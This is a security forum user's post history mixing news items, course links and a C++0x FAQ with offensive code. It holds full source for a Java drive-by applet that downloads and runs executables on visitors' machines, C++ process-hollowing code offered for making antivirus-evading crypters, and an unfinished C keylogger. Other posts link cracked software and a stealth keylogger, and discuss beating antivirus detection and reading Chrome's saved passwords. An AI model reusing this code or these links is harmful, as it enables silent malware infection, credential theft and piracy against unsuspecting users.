Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Java Drive-By - Source Code Nu11 So umm there isn't any java forum and it's not worth making one so I'm posting it here The source is completely commented & compiles with latest java Java Source: import java.applet.Applet; import java.io.BufferedOutputStream; import java.io.BufferedReader; import java.io.File; import java.io.FileOutputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.URL; import java.net.URLConnection; import java.security.AccessControlException; import java.util.ArrayList; // //Change Example to what you want users to see as your Applet Name @SuppressWarnings("serial") public class Exploit extends Applet{ //Same here public Exploit(){ } public String getContents(File aFile) { StringBuilder contents = new StringBuilder(); try { BufferedReader input = new BufferedReader(new FileReader(aFile)); try { String line = null; //not declared within while loop while (( line = input.readLine()) != null){ contents.append(line); contents.append(System.getProperty("line.separator")); } } finally { input.close(); } } catch (IOException ex){ ex.printStackTrace(); } return contents.toString(); } public String getConfig(String link){ try { URLConnection url = null; BufferedReader in = null; url = new URL(link).openConnection(); in = new BufferedReader(new InputStreamReader(url.getInputStream())); String str = in.readLine(); if (in != null) { in.close(); } return str; } catch (final IOException e) { } return null; } public ArrayList<String> getConfigArray(String link){ URLConnection url = null; String line; ArrayList<String> file = new ArrayList<String>(); try { url = new URL(link).openConnection(); BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream())); while ((line = in.readLine()) != null) file.add(line); if (in != null) { in.close(); } return file; } catch (final IOException e) { } return null; } public ArrayList<String> loadFile(String fileName) { if ((fileName == null) || (fileName == "")) throw new IllegalArgumentException(); String line; ArrayList<String> file = new ArrayList<String>(); try { BufferedReader in = new BufferedReader(new FileReader(fileName)); if (!in.ready()) throw new IOException(); while ((line = in.readLine()) != null) file.add(line); in.close(); } catch (IOException e) { System.out.println(e); return null; } return file; } //Main Method public void start() throws AccessControlException{ String userdir = System.getProperty("user.home"); String configs = "config.ini"; String urlss = "urls.ini"; String filess = "files.ini"; //FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\\ String mainURL = "http://site.com/"; ///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //try{ //////////////////////////////////FILE 1////////////////////////////////// if(getConfig(mainURL+configs).contains("1") || getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname = "\\"+getConfigArray(mainURL+filess).get(0); String fpath = userdir.concat(fname); final String locationDownload = getConfigArray(mainURL+urlss).get(0); download(locationDownload, fpath); final Runtime run = Runtime.getRuntime(); try { run.exec(fpath); } catch (final IOException e) { } } //////////////////////////////////FILE 2////////////////////////////////// if(getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname2 = "\\"+getConfigArray(mainURL+filess).get(1); final Runtime run = Runtime.getRuntime(); String fpath2 = userdir.concat(fname2); final String locationDownload2 = getConfigArray(mainURL+urlss).get(1); download(locationDownload2, fpath2); try { run.exec(fpath2); } catch (final IOException e){ } } //////////////////////////////////FILE 3///////////////////////////////// if(getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname3 = "\\"+getConfigArray(mainURL+filess).get(2); final Runtime run = Runtime.getRuntime(); String fpath3 = userdir.concat(fname3); final String locationDownload3 = getConfigArray(mainURL+urlss).get(2); download(locationDownload3, fpath3); try { run.exec(fpath3); } catch (final IOException e){ } } /////////////////////////////////FILE 4////////////////////////////////// if(getConfig(mainURL+configs).contains("4")){ String fname4 = "\\"+getConfigArray(mainURL+filess).get(3); final Runtime run = Runtime.getRuntime(); String fpath4 = userdir.concat(fname4); final String locationDownload3 = getConfigArray(mainURL+urlss).get(3); download(locationDownload3, fpath4); try { run.exec(fpath4); } catch (final IOException e){ } } ////////////////////////////////END/////////////////////////////////// //}catch (AccessControlException e){ // System.out.println("hi"); // } } public void download(final String address, final String localFileName) { OutputStream out = null; URLConnection conn = null; InputStream in = null; try { final URL url = new URL(address); out = new BufferedOutputStream(new FileOutputStream(localFileName)); conn = url.openConnection(); in = conn.getInputStream(); final byte[] buffer = new byte[1024]; int numRead; while ((numRead = in.read(buffer)) != -1) { out.write(buffer, 0, numRead); } } catch (final Exception exception) { } finally { try { if (in != null) { in.close(); } if (out != null) { out.close(); } } catch (final IOException ioe) { } } } public void main(String args[]){ start(); } public void stop(){ } } Create the config.ini in notepad and just put a numeric value for the amount of exe's you want it to execute. if you're only having it dl/exec 1 file then for the value put 1 Create the files.ini in notepad and just put the name of the file its going to download, if you're hosting the file as blah.exe just put blah.exe Create the urls.ini and just put the full download link of whatever file you want it to download and execute. have fun Apoi: <applet width='1' height='1' code='java.class' archive='java.jar'> </applet> Sursa: Java Drive-By (Not Really), Full Source Code
  2. Nytro
    RealVNC Enterprise v4.6.0+keygen Nu l-am descarcat, nu stiu daca e infectat, executati pe riscul vostru. RealVNC Enterprise v4.6.0 Incl Keymaker-CORE | 5.85 MB VNC® Enterprise Edition - A greatly enhanced version of VNC, developed for use in enterprises of all sizes. Designed and built from the ground up by the original inventors of VNC, Enterprise Edition provides secure, robust and easily-administered remote-control with a minimum of fuss. Existing Free Edition users considering upgrading may find this feature comparison useful. There is also a handy datasheet (pdf). FEATURES : Printing Cross-Platform VNC Chat Integrated Session Security [new] System Authentication One-Port HTTP & VNC HTTP Proxy Support Desktop Scaling Cross-Platform Interoperability File Transfer [new] Integrated VNC Address Book VNC Deployment Tool (Windows only) Home: http://www.realvnc.com/products/enterprise/index.html Download: http://www.filesonic.com/file/1204491664/RealVNC.Enterprise.v4.6.0.Incl.Keymaker-CORE.7z Sursa: RealVNC Enterprise v4.6.0+keygen - r00tsecurity
  3. Nytro
    Award Keylogger v2.6 (x86-x64) full Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Award Keylogger v2.6 (x86-x64) | 9.36 MB Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. FEATURES : • New! Run keylogger as a Windows service • Easy-to-use, even for beginners • Absolutely invisible/stealth mode • Logs accounts and passwords typed in the every application • Logs message typed in all instant messengers • Visual surveillance, support screenshots view • Slide show for screenshots • Captures the contents behind the asterisks • Captures mouse clicks • Logs websites visited • Captures AOL/AIM/Yahoo/ICQ chats • Keyword Detection and Notification • Records contents of password protected web pages, including Web Mail messages • Logs Windows Clipboard • Sends log by e-mail • Uploads ALL logs into the separate folders by FTP • Invisible for the firewall program • Invisible in the Windows startup list • Monitors all users of the PC • User friendly HTML file format for emailed logs • Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List • Records Windows 9.x/Me/2000/XP/VISTA logon passwords • Intercepts DOS-box and Java-chat keystrokes • Supports international keyboards • External log viewer • Supports printing of the log • Optimized for Windows XP • Exports log to HTML INSTALL 1. Extract files with WinRAR 2. Install Application 3. Use the patch Download: http://www.filesonic.vn/file/1199695194 or http://www.fileserve.com/file/KUETVaP or http://bitshare.com/files/rwaig065/Award-Keylogger-v2.6--x86-x64-.rar.html Sursa: Award Keylogger v2.6 (x86-x64) full - r00tsecurity
  4. Nytro
    Windows XP, Vista AutoRun update reduces malware infections by 82 percent February's "backport" of the Windows 7 feature worked like a charm, says Microsoft By Gregg Keizer | Computerworld Microsoft today credited a February security update for lowering AutoRun-abusing malware infection rates on Windows XP and Vista by as much as 82 percent since the start of the year. Four months ago, Microsoft offered XP and Vista users an optional update -- which was later changed to automatically download and install -- that disabled AutoRun. [ Master your security with InfoWorld's interactive Security iGuide. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter. ] Microsoft changed AutoRun's behavior in Windows 7 to block automatic execution of files on a USB drive. It first backported the modifications to Windows XP and Vista in 2009. Until February, however, users had to manually seek out the update. With the update in place, flash drives inserted into a PC running XP or Vista no longer offer the option to run programs. AutoRun's extinction does not affect CDs or DVDs, however. The move has paid off in spades, said Microsoft today. "The infection rates for Windows XP and Vista went down ... pretty significantly, in fact," said Holly Stewart, a senior program manager with the MMPC (Microsoft Malware Protection Center), in a blog post Tuesday. According to statistics compiled by the MMPC from data delivered by the Malicious Software Removal Tool (MSRT), a free utility that detects and deletes some attack code, infection rates of malware that spreads through AutoRun plummeted after the February update reached XP and Vista. Since January 2011, the month before the AutoRun update shipped, infection rates of XP Service Pack 3 (SP3) -- the sole version still supported by Microsoft -- have dropped by 62 percent. Vista SP1's infection rate has fallen by 68% while Vista SP2's has plunged by 82 percent in the same period. Microsoft will abandon support of Vista SP1 next month . "That's a huge reduction," said Andrew Storms, director of security operations at nCircle Security. "Imagine if AutoRun was never invented." Storms was talking about the fact that the Windows feature was abused by some of the highest-profile worms in the last two years, including Conficker and Stuxnet. Microsoft credits a February update for XP and Vista for dramatically dropping infection rates of AutoRun-abusing malware. The former relied on AutoRun -- among other propagation techniques -- to infect millions of PCs, while analysts believe the latter used AutoRun to infect Iranian computers associated with the country's uranium enrichment program. Microsoft's Stewart also described an unanticipated side-effect of the update. "What was unexpected, is that there appears to have been a residual effect ...a 'secondhand smoke' kind of effect on adjacent systems that were already protected with proactive defenses," said Stewart, citing Microsoft's own security products, including the free Security Essentials and the for-a-fee, enterprise-grade Forefront line. "The infection attempts on these computers also went down immediately after the update was released." In an interview Tuesday, Jerry Bryant, a group manager with the MSRC (Microsoft Security Response Center), said that the decrease in infection attempts -- ones stymied by a Microsoft antivirus signature -- was due the AutoRun update preventing large numbers of primary infections. "We attribute the overall decline in infections to fewer systems trying to propagate using AutoRun," said Bryant. In February, Microsoft noted that the AutoRun update would break the functionality of some USB drives. "Users who install this update will no longer receive a setup message that prompts them to install programs that are delivered by USB flash drives. Users will have to manually install the software," Microsoft warned in a security advisory at the time. The company has also published the "Enable Autorun" tool that customers can deploy to disable the update's changes and revert to Windows XP's and Vista's earlier behavior. Sursa: Windows XP, Vista AutoRun update reduces malware infections by 82 percent | Security - InfoWorld
  5. Nytro
    Probabil tehnologie anti-rootkit. Ma uitam la videoclipuri de pe Sysinternals si am vazut cam cum functioneaza. Verifica fisierele dintr-un folder folosind API-urile clasice, de exemplu. Apoi aceeasi verificare folosind acces brut la sistemul de fisiere NTFS. Daca lipseste ceva, clar, e ascuns. Asta ar fi o idee. Oricum, solutii sunt multe dar foarte complicate. Se poate verifica de SSDT hooks, e complicat. Vreau ca pe viitor sa ma axez tocmai pe acest domeniu, am inceput sa citesc Windows Internals 5th Edition. Momentan nu stiu foarte multe nici eu...
  6. Nytro
    Sa tii un executabil de exemplu, ca resursa, ca sectiune sau orice altceva, si acel fisier sa nu fie detectabil e banal. Eu pus si simplu adaugam "1" la fiecare octet, si 255 il faceam 0 si nu mai era detectabil. Partea detectabila e loader-ul, codul care incarca executabilul in memorie, sau dropper-ul, partea de cod in care stub-ul se autociteste sau se copiaza pe nu stiu unde, sau "Anti-****"-urile... Asta e greu. Pe ideea cryptarii sectiunii de cod a unui executabil s-ar putea face niste incercari, nu ar mai fi trebuit incarcat in memorie, doar la executie sa se modifice sectiunea de cod, entrypointul poate sa fie acelasi, dar trebuie adaugat codul de decryptare acolo, sectiunea trebuie sa fie MEM_WRITE, sunt cateva lucruri care trebuie facute, dar merge.
  7. Nytro
    Da, este calea mai "1337". Mai dificila, fara documentatie pentru functie... Mai interesanta si mai atragatoare. +1
  8. Nytro
    Vazusem un videoclip facut de muts (Mati Ahroni) bazat pe aceeasi tehnica. Nu stiu ca de eficienta e, e posibil sa fie detectata de scanarile heuristice moderne. Am vrut sa fac un packer pe aceasta idee, poate chiar o sa fac, dar am niste chestii pe cap vreo doua saptamani.
  9. Nytro
    Daca stiam ca o sa apara in articol, scriam si noi ceva mai concret si mai elegant. Oricum, nu suntem noi "hackeri", dar suntem persoane din domeniu... Si da, imi place articolul, e "altfel".
  10. Nytro
    O sa te razgandeti cu timpul, cand vei vedea ca exista si alte lucruri in afara de ce faci in liceu... Tu ai enumerat doar materie de liceu.
  11. Nytro
    C++0x - the next ISO C++ standard This document is written by and maintained by Bjarne Stroustrup. Constructive comments, correction, references, and suggestions are of course most welcome. Currently, I'm working to improve completeness and clean up the references. C++0x is the next ISO C++ standard. Currently a draft is available for comments. The previous (and current) standard is often referred to as C++98 or C++03; the differences between C++98 and C++03 are so few and so technical that they ought not concern users. The final committee draft standard is currently (March 2010) being voted on by the national standards bodies. After that there will be more work before all comments have been addressed and the ISO bureaucracy satisfied. At the current stage of the proceedings, no features (even very minor ones) are expected to be added or removed. The name "C++0x" is a relict of the days where I and others, hoped for a C++08 or C++09. However, to minimize confusion, I'll keep referring to the upcoming C++ standard with the feature set defined here as C++0x. Think of 'x' as hexadecimal (most likely 'B', i.e. C++11). If you have comments on C++0x, please find some member of your national standards body -- or a member of any standards body -- to send your comments to. That's now the only way and will ensure that the committee doesn't have to deal with many very similar comment. Remember, the committee consists of volunteers with limited time and resources. All official documents relating to C++0x can be found at the ISO C++ committee's website. The official name of the committee is SC22 WG21. Caveat: This FAQ will be under construction for quite a while. Comments, questions, references, corrections, and suggestions welcome. Purpose The purpose of this C++0x FAQ is To give an overview of the new facilities (language features and standard libraries) offered by C++0x in addition to what is provided by the previous version of the ISO C++ standard. To give an idea of the aims of the ISO C++ standards effort. To present a user's view of the new facilities To provide references to allow for a more in depth study of features. To name many of the individuals who contributed (mostly as authors of the reports they wrote for the committee). The standard is not written by a faceless organization. Please note that the purpose of this FAQ is not to provide comprehensive discussion of individual features or a detailed explanation of how to use them. The aim is to give simple examples to demonstrate what C++0x has to offer (plus references). My ideal is "max one page per feature" independently of how complex a feature is. Details can often be found in the references. Lists of questions Here are some high-level questions What do you think of C++0x? When will C++0x be a formal standard? When will compilers implement C++0x? When will the new standard libraries be available? What new language features will C++0x provide? (a list); see also the questions below What new standard libraries will C++0x provide? (a list); see also the questions below What were the aims of the C++0x effort? What specific design aims guided the committee? Where can I find the committee papers? Where can I find academic and technical papers about C++0x? (a list) Where else can I read about C++0x? (a list) Are there any videos about C++0x? (a list) Is C++0x hard to learn? How does the committee operate? Who is on the committee? In which order should an implementer provide C++0x features? Will there be a C++1x? What happened to "concepts? Are there any features you don't like? Questions about individual language features can be found here: __cplusplus alignments attributes atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) copying and rethrowing exceptions constant expressions (generalized and guaranteed;constexpr) decltype defaulted and deleted functions (control of defaults) delegating constructors Dynamic Initialization and Destruction with Concurrency explicit conversion operators extended integer types extern templates for statement; see range for statement suffix return type syntax (extended function declaration syntax) in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas local classes as template arguments long long integers (at least 64 bits) memory model move semantics; see rvalue references Inline namespace Preventing narrowing null pointer (nullptr) PODs (generalized) range for statement raw string literals right-angle brackets rvalue references Simple SFINAE rule static (compile-time) assertions (static_assert) template alias template typedef; see template alias thread-local storage (thread_local) unicode characters Uniform initialization syntax and semantics unions (generalized) user-defined literals variadic templates I often borrow examples from the proposals. In those cases: Thanks to the proposal authors. Many of the examples are borrowed from my own talks and papers. Questions about individual standard library facilities can be found here: abandoning a process Improvements to algorithms array async() atomic operations Condition variables Improvements to containers function and bind forward_list a singly-liked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits Mutual exclusion random number generators regex a regular expression library scoped allocators shared_ptr smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads Time utilities tuple unique_ptr unordered_map weak_ptr system error Below are questions to specific questions as indexed above. Tutorial: http://www2.research.att.com/~bs/C++0xFAQ.html
  12. Nytro
    Ceva imi spune ca nu mai dureaza mult pana primesti ban...
  13. Nytro
    Qubes – sistem de operare Open Source construit pentru a fi sigur Andrei Av?d?nei, 13.06.2011 Qubes este un sistem de operare Open Source ce dispune de o arhitectur? special creat? pentru a oferi o experien?? de navigare desktop sigur?. Este bazat pe Xen, X Window System ?i Linux, putând rula aproape orice tip de aplica?ie Linux ?i utiliza majoritatea driverelor Linux. Autorii acestuia promit c? in viitor vor include ?i suportul pentru rularea aplica?iilor Windows. Qubes, aflat în varianta beta, are o abordare de tipul “Securitate prin izolare”. Pentru a face asta, Qubes folose?te ca principiu de baz? virtualizarea, având posibilitatea s? izoleze diverse programe unele de altele sau chiar diverse componente ale sistemului, precum re?eaua, subsistemul de stocare ?amd. Asta incearc? s? previn? afectarea integrit??ii sistemului de problemele ap?rute într-un subsistem. Qubes are câteva profile create pentru ma?inile virtuale (cunoscute ca AppVMs) precum “personal”, “work”, “shopping”, “bank” sau “random” ?i permite rularea aplica?iilor ca ?i cum s-ar executa pe ma?ina local?. Mai suport? ?i copierea ?i mutarea sigur? a unei aplica?ii dintr-o ma?in? virtual? în alta. Mai multe detalii despre arhitectura sistemului de operare g?si?i aici iar câteva fotografii cu acesta aici. Sursa: Qubes - sistem de operare Open Source construit pentru a fi sigur | WorldIT
  14. Nytro
    Spanish police website hit by Anonymous hackers 13 June 2011 Last updated at 10:50 GMT The website of Spain's national police force has been briefly knocked offline by hacker collective Anonymous. The attack on the site was carried out in retaliation for the arrest of three Spanish men the police claimed were 'core' members of the group. The hackers managed to keep Pgina Oficial del Cuerpo Nacional de Polica offline for about an hour from 2130 GMT on 12 June. Spanish authorities would not confirm that Anonymous was behind the attack, saying only that the site was offline. However, a statement was posted on a website linked to Anonymous, claimed responsibility for the hack, which it called #OpPolicia. The group said it had used a distributed denial of service attack (DDoS) which bombards a target website with so much data that it becomes overwhelmed. A spokesman for the Spanish police said the cause of the outage had not yet been established. "A website can collapse if too many people try to access it at once. I cannot confirm the link with the Anonymous group," said the spokesman. In its statement, Anonymous said the DDoS attack was a "direct response to the Friday arrests of three individuals alleged to be associated with acts of cyber civil disobedience attributed to Anonymous." The group said DDoS attacks were a legitimate form of peaceful protest. Some of its members are thought to have carried out similar attacks on Turkish government websites to protest against net censorship. Anonymous also denied that the men arrested were part of the "core" of Spanish members of the group. "They did not arrest any core group, because we don't have a core group," said Anonymous in its statement. Sursa: BBC News - Spanish police website hit by Anonymous hackers
  15. Nytro
    Blind Sql Injection – Regular Expressions Attack Authors: // Removed on request Index Why blind sql injection?......................................................................................................................3 How blind sql injection can be used?...................................................................................................3 Testing vulnerability (MySQL - MSSQL):........................................................................................3 Time attack (MySQL)...........................................................................................................................3 Time attack (MSSQL)..........................................................................................................................4 Regexp attack's methodology................................................................................................................5 Finding table name with Regexp attack (MySQL)...........................................................................5 Finding table name with Regexp attack (MSSQL)...........................................................................6 Exporting a value with Regexp attack (MySQL).............................................................................7 Exporting a value with Regexp attack (MSSQL).............................................................................7 Time considerations.............................................................................................................................8 Bypassing filters..................................................................................................................................9 Real life example.................................................................................................................................9 Conclusions.........................................................................................................................................9 Download: http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf
  16. Nytro
    Cursul 9 lipseste, nu stiu de ce... Nu e nici la "sursa".
  17. Nytro
    Interesant. Dar le mut la programare, sunt mai utile acolo.
  18. Nytro
    Sunt materialele de curs ale unui profesor (cu care am facut si eu, dar nu criptografie) de la Universitatea Bucuresti, Facultatea de Matematica-Informatica: Adrian Atanasiu Cursul de Criptografie (semestrul 1) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Cursul 10 Cursul 11 Cursul 12 Cursul 13 Cursul de Criptografie (semestrul 2) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Sursa: http://www.galaxyng.com/adrian_atanasiu/cript.htm PS: Puteti cauta cartile dumnealui: - Securitatea informatiei - Vol. I - Criptografie - Securitatea informatiei - Vol. II - Protocoale de securitate - Arhitectura sistemelor de calcul Toate sunt de la editura InfoData cred.
  19. Nytro
    Da, era intr-o revista articolul, de acolo nu am stat sa il citesc, dar postat si aranjat il voi citi, thanks.
  20. Nytro
    Da, dar nu e tocmai genial sa iti dai seama ca e vorba de o baza de data SQLite. O poti deschide cu SQLite Explorer, sau nu stiu ce utilitar pentru astfel de baze de date si poti vedea structura, apoi "SELECT * FROM logins" si uite parolele. Daca deschizi acel fisier "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" cu Notepad, primele caractere sunt: "SQLite format 3", apoi gasesti si: "CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,ssl_valid INTEGER NOT NULL,preferred INTEGER NOT NULL,date_created INTEGER NOT NULL,blacklisted_by_user INTEGER NOT NULL,scheme INTEGER NOT NULL,UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))" care spune tot ce iti trebuie.
  21. Nytro
    PS: Ideea e urmatoarea: baiatul de la Jurnalul, pe langa faptul ca nu e deloc paralel cu domeniul, a colaborat in nenumarate randuri cu Hackersblog. Deci e o legatura intre RST si Jurnalul. Cum spunea si el: daca scrie cineva un articol, fara sa va intrebe pe voi, atot-cunoscatorii, nu e bine. Daca va intreaba, tot nu e bine. Deci sunteti ratati. Ontopic: Probabil e vorba de un simplu SQL Injection. Ce vreau sa spun: in ziua de azi sunt foarte multe persoane care "stiu" SQL Injection si foarte multe dintre ele, pe langa aerele de hackeri mondiali doresc sa se faca remarcati. Si da, acest tip de atac, pe langa faptul ca nu e foarte dificil, poate avea rezultate frumusele: de la acces la datele din baza de date la root pe serverul pe care il ataca. Probabil e vorba de cineva care incearca sa se faca remarcat. Nu cred ca e vorba de ceva mai complex, daca se baga vreo organizatie guvernamentala probabil ar fi aparut si alte probleme, politice de exemplu. Si atacul nu ar fi fost simplu, probabil ar fi scanat mai intai intreaga retea a FMI-ului, sa obtina cat mai multe informatii, posibil sa se fi folosit de persoane din interior... Eu raman la ideea ca un pusti cu atitudine de "hacker" s-a gandit sa caute SQL Injection (sau LFI, XSS... ) intr-un site mare, o fi cautat pe Google in functie de un dork si ce a gasit? FMI...
  22. Nytro
    [c++] Run Program From Memory And Not File Author: Galco void RunFromMemory(char* pImage,char* pPath) { DWORD dwWritten = 0; DWORD dwHeader = 0; DWORD dwImageSize = 0; DWORD dwSectionCount = 0; DWORD dwSectionSize = 0; DWORD firstSection = 0; DWORD previousProtection = 0; DWORD jmpSize = 0; IMAGE_NT_HEADERS INH; IMAGE_DOS_HEADER IDH; IMAGE_SECTION_HEADER Sections[1000]; PROCESS_INFORMATION peProcessInformation; STARTUPINFO peStartUpInformation; CONTEXT pContext; char* pMemory; char* pFile; memcpy(&IDH,pImage,sizeof(IDH)); memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH)); dwImageSize = INH.OptionalHeader.SizeOfImage; pMemory = (char*)malloc(dwImageSize); memset(pMemory,0,dwImageSize); pFile = pMemory; dwHeader = INH.OptionalHeader.SizeOfHeaders; firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections); memcpy(pFile,pImage,dwHeader); if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = INH.OptionalHeader.SizeOfHeaders; } else { jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) { jmpSize = 0; dwSectionSize = Sections[dwSectionCount].SizeOfRawData; memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize); if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = Sections[dwSectionCount].Misc.VirtualSize; } else { jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); } memset(&peStartUpInformation,0,sizeof(STARTUPINFO)); memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION)); memset(&pContext,0,sizeof(CONTEXT)); peStartUpInformation.cb = sizeof(peStartUpInformation); if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation)) { hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); pContext.ContextFlags = CONTEXT_FULL; GetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten); pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0); ResumeThread(peProcessInformation.hThread); } free(pMemory); } This function will run a process based on it's memory instead of running a process from a file. Meaning, you can use this in crypters to have fud runtime. You can basically load an exe as a resource into your code and run it as a process like this: int main(int argc,char* argv[]) { HGLOBAL hResData; HRSRC hResInfo; void *pvRes; DWORD dwSize; char* lpMemory; HMODULE hModule = GetModuleHandle(NULL); if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL)) { dwSize = SizeofResource(hModule, hResInfo); lpMemory = (char*)malloc (dwSize); memset(lpMemory,0,dwSize); memcpy (lpMemory, pvRes, dwSize); RunFromMemory(lpMemory,argv[0]); } } The program running the process must have the same image base or else it will not work. By the way, ignore these two lines: hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); I forgot to edit them out when I posted the function. Lol. Dont ask what they were used for. Sursa: [c++] Run Program From Memory And Not File - rohitab.com - Forums
  23. Nytro
    [C] GetRawInputData() keylogger Author: defsanguje Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level. More info can be found here. #define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow); // Globals const char g_szClassName[] = "klgClass"; // Window procedure of our message-only window LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { static HANDLE hLog; UINT dwSize; RAWINPUTDEVICE rid; RAWINPUT *buffer; switch(msg) { case WM_CREATE: // Register a raw input device to capture keyboard input rid.usUsagePage = 0x01; rid.usUsage = 0x06; rid.dwFlags = RIDEV_INPUTSINK; rid.hwndTarget = hwnd; if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE))) { MessageBox(NULL, "Registering raw input device failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return -1; } // open log.txt hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(hLog == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Creating log.txt failed!", "Error", MB_ICONEXCLAMATION|MB_OK); return -1; } // append SetFilePointer(hLog, 0, NULL, FILE_END); break; case WM_INPUT: // request size of the raw input buffer to dwSize GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER)); // allocate buffer for input data buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize); if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER))) { // if this is keyboard message and WM_KEYDOWN, log the key if(buffer->header.dwType == RIM_TYPEKEYBOARD && buffer->data.keyboard.Message == WM_KEYDOWN) { if(LogKey(hLog, buffer->data.keyboard.VKey) == -1) DestroyWindow(hwnd); } } // free the buffer HeapFree(GetProcessHeap(), 0, buffer); break; case WM_DESTROY: if(hLog != INVALID_HANDLE_VALUE) CloseHandle(hLog); PostQuitMessage(0); break; default: return DefWindowProc(hwnd, msg, wParam, lParam); } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WNDCLASSEX wc; HWND hwnd; MSG msg; // register window class ZeroMemory(&wc, sizeof(WNDCLASSEX)); wc.cbSize = sizeof(WNDCLASSEX); wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = g_szClassName; if(!RegisterClassEx(&wc)) { MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // create message-only window hwnd = CreateWindowEx( 0, g_szClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL ); if(!hwnd) { MessageBox(NULL, 